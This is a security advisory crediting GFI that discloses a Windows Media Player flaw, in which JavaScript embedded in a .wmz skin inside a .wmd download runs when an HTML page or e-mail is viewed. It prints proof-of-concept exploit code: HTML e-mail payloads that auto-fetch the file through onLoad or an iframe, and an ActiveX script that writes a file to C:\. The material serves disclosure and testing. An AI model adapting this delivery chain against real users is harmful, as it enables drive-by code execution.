|
|
|
|
| |
GFI has recently discovered a security flaw within Windows Media Player which allows a malicious user to run arbitrary code on a target machine as it attempts to view a website or an HTML E-mail. This vulnerability has been previously discussed in our article:
Windows 2000 .ASX and .WMS buffer overrun (Exploit and Patch available).
An exploit code is now available to test for this problem. |
| |
Credit:
The information has been provided by Sandro Gauci of GFI.
|
| |
Vulnerable systems:
Windows 95/98/ME (WMP7 is installed by default)
Windows NT
Windows 2000
The vulnerability can be exploited by embedding a JavaScript (.js) file within a Media Player skin file (.wmz) that can also be embedded into a Windows Media Download file (.wmd). This does not require the user to run any attachments since the Media Player file can be automatically executed using a IFrame tag or a window.open() within a <script> tag.
Exploit:
<Embedded within an HTML file or e-mail>
E-mail Example 1.
<head>
<script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { file://v2.0
alert('This exploit will now open a new window\n
and automatically download the wmd file\n
and execute it. This will create a file named\n
gfiseclab.txt in your C:\\');
window.open(theURL,winName,features);
}
file://-->
</script>
</head>
<body bgcolor="#FFFFFF"
onLoad="MM_openBrWindow('http://website/test.wmd','','width=0,height=0')">
</Embedded within an HTML e-mail>
E-mail Example 2.
<html>
<body>
<script>
alert('This exploit will now open a new window \n and automatically download
the wmd file \n
and execute it. This will create a file named \n gfiseclab.txt in your
C:\\')</script>
<iframe src="http://website/test.wmd"></iframe></body>
</html>
-------------------------------------
test.wmd is a compressed zip file that contains the following files:
* test.asx: meta file which points to an mpg file and the exploit skin file
* test.mpg: an example mpeg movie.
* test.wmz: the exploit skin file.
test.wmz is also a compressed zip file containing:
* test.js: our javascript which contains the following code
************************************
var fso, f1;
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
function onload(){
playAgain();
}
************************************
* test.wms: another metafile which calls test.js
Solution:
See: Windows 2000 .ASX and .WMS buffer overrun (Exploit and Patch available).
|
|
|
|
|
